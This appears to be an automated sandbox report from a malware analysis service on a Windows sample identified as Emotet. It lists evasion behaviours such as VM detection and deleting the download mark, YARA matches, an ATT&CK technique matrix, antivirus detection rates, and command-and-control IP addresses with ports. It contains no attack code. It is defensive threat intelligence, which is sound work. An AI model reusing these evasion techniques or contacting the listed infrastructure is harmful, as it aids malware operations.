Source: C:\Users\user\Desktop\malware.exe

PE file moved: C:\Windows\SysWOW64\mathsearch.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\malware.exe

File opened: C:\Windows\SysWOW64\mathsearch.exe:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\malware.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_1-15997

Source: C:\Users\user\Desktop\malware.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\malware.exe

API coverage: 6.5 %

Source: C:\Windows\System32\svchost.exe TID: 5432

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\malware.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000009.00000002.465296733.000002008E862000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000000.00000002.205254456.000001E32BC60000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.268996782.000001F082C60000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.293346156.000001F099D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.463772340.000001CE49140000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000009.00000002.465271493.000002008E84C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000000.00000002.205254456.000001E32BC60000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.268996782.000001F082C60000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.293346156.000001F099D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.463772340.000001CE49140000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000000.00000002.205254456.000001E32BC60000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.268996782.000001F082C60000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.293346156.000001F099D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.463772340.000001CE49140000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000009.00000002.462353213.000002008902A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`C
Source: svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.462303353.0000019AF6E2A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000000.00000002.205254456.000001E32BC60000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.268996782.000001F082C60000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.293346156.000001F099D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.463772340.000001CE49140000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\mathsearch.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\malware.exe

Code function: 1_2_00051F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

1_2_00051F40

Source: C:\Users\user\Desktop\malware.exe

Code function: 1_2_00051BE0 mov eax, dword ptr fs:[00000030h]

1_2_00051BE0

Source: C:\Users\user\Desktop\malware.exe

Code function: 1_2_000515B0 GetModuleFileNameW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateEventW,CreateMutexW,CloseHandle,GetLastError,SetEvent,CloseHandle,CloseHandle,memset,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

1_2_000515B0

Source: C:\Users\user\Desktop\malware.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mathsearch.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\malware.exe

Code function: 1_2_00058D50 RtlGetVersion,GetNativeSystemInfo,

1_2_00058D50

Source: C:\Windows\SysWOW64\mathsearch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: svchost.exe, 00000011.00000002.462710797.000002762D43D000.00000004.00000001.sdmp	Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000011.00000002.462601465.000002762D413000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: malware.exe, type: SAMPLE
Source: Yara match	File source: 00000002.00000002.202770613.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.202524234.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.194767898.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.461993128.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.193972656.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.201510577.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.200691249.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.malware.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.malware.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.malware.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.malware.exe.50000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection1	Masquerading12	OS Credential Dumping	Security Software Discovery51	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery24	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
malware.exe	83%	Virustotal		Browse
malware.exe	97%	ReversingLabs	Win32.Trojan.Emotet
malware.exe	100%	Avira	TR/Crypt.XPACK.Gen
malware.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.mathsearch.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.mathsearch.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.malware.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.mathsearch.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.mathsearch.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.malware.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.malware.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.malware.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://79.172.249.82:443/	3%	Virustotal		Browse
https://79.172.249.82:443/	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://79.172.249.82:443/	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000F.00000002.308249987.0000018A12613000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.308249987.0000018A12613000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000F.00000002.308290125.0000018A1264E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000F.00000003.286268286.0000018A12631000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000F.00000003.307995470.0000018A1265A000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000F.00000003.286268286.0000018A12631000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000F.00000002.308298188.0000018A1265C000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000009.00000002.465492884.000002008EA00000.00000002.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000F.00000002.308290125.0000018A1264E000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.307995470.0000018A1265A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000F.00000003.286268286.0000018A12631000.00000004.00000001.sdmp	false		high
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000F.00000002.308298188.0000018A1265C000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000F.00000002.308249987.0000018A12613000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000F.00000003.307995470.0000018A1265A000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
193.169.54.12	unknown	Germany	49464	ICFSYSTEMSDE	false
80.86.91.232	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	false
173.230.145.224	unknown	United States	63949	LINODE-APLinodeLLCUS	false
79.172.249.82	unknown	Hungary	43711	SZERVERNET-HU-ASHU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385110
Start date:	11.04.2021
Start time:	22:47:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	malware (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@18/5@0/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 42.9% (good quality ratio 39.3%) Quality average: 79% Quality standard deviation: 30.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, wermgr.exe, backgroundTaskHost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 93.184.220.29, 20.50.102.62, 40.88.32.150, 23.57.80.111, 92.122.213.247, 92.122.213.194, 104.43.193.48, 51.103.5.186, 20.54.26.129, 40.126.29.7, 20.190.157.11, 40.126.29.5, 40.126.29.8, 40.126.29.12, 40.126.29.10, 40.126.29.6, 40.126.29.9, 52.255.188.83 Excluded domains from analysis (whitelisted): san.current.a.prd.aadg.trafficmanager.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:48:55	API Interceptor	2x Sleep call for process: svchost.exe modified
22:50:10	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.169.54.12	_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
80.86.91.232	Invoice.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Overdue payment.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Outstanding Invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Outstanding Invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Emote.exe	Get hash	malicious	Browse	80.86.91.232:4143/
	Question.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Paypal.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Paypal.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	960-27-621120-257 & 960-27-621120-969.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Rechnung.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Open invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	20180212-20_46_01_.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	SalesInvoice.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	SalesInvoice.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	80.86.91.232:7080/
	Scan1782384.doc	Get hash	malicious	Browse	80.86.91.232:7080/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GD-EMEA-DC-SXB1DE	zeD11Fztx8.exe	Get hash	malicious	Browse	80.86.91.232
	TRS-11-0221-020.exe	Get hash	malicious	Browse	85.25.177.199
	Payment Advice.exe	Get hash	malicious	Browse	85.25.177.199
	VMtEguRH.exe	Get hash	malicious	Browse	85.25.177.199
	Reports-018315.xlsm	Get hash	malicious	Browse	185.21.102.197
	Reports-018315.xlsm	Get hash	malicious	Browse	185.21.102.197
	D12547698.VBS	Get hash	malicious	Browse	85.25.93.141
	sample.exe.exe	Get hash	malicious	Browse	80.86.91.232
	5zc9vbGBo3.exe	Get hash	malicious	Browse	217.172.179.54
	InnAcjnAmG.exe	Get hash	malicious	Browse	217.172.179.54
	yxghUyIGb4.exe	Get hash	malicious	Browse	80.86.91.232
	TaTYytHaBk.exe	Get hash	malicious	Browse	85.25.43.31
	8X93Tzvd7V.exe	Get hash	malicious	Browse	217.172.179.54
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.Mal.GandCrypt-A.24654.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	217.172.179.54
	csrss.bin.exe	Get hash	malicious	Browse	188.138.33.233
	yx8DBT3r5r.exe	Get hash	malicious	Browse	92.51.129.66
	E00636067E.exe	Get hash	malicious	Browse	85.25.177.199
	http___contributeindustry.com_js_engine-rawbin.exe	Get hash	malicious	Browse	85.25.177.199
ICFSYSTEMSDE	zeD11Fztx8.exe	Get hash	malicious	Browse	193.169.54.12
	9fdUNaHzLv.exe	Get hash	malicious	Browse	193.169.54.12
	sample.exe.exe	Get hash	malicious	Browse	193.169.54.12
	yxghUyIGb4.exe	Get hash	malicious	Browse	193.169.54.12
	0HvIGwMmBV.exe	Get hash	malicious	Browse	193.169.54.12
	pitEBNziGR.exe	Get hash	malicious	Browse	193.169.54.12
	_01_.doc	Get hash	malicious	Browse	193.169.54.12
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12
LINODE-APLinodeLLCUS	zeD11Fztx8.exe	Get hash	malicious	Browse	173.230.145.224
	CNTR-NO-GLDU7267089.xlsx	Get hash	malicious	Browse	45.56.127.45
	gunzipped.exe	Get hash	malicious	Browse	45.56.119.148
	frox0cheats.exe	Get hash	malicious	Browse	176.58.123.25
	nDHV6wKWHF.exe	Get hash	malicious	Browse	172.104.164.58
	OfficeConsultPlugin.exe	Get hash	malicious	Browse	109.237.24.104
	RFQ#798606.exe	Get hash	malicious	Browse	45.56.119.148
	Private doc.docm	Get hash	malicious	Browse	109.237.24.104
	lK8vF3n2e7.exe	Get hash	malicious	Browse	172.104.233.225
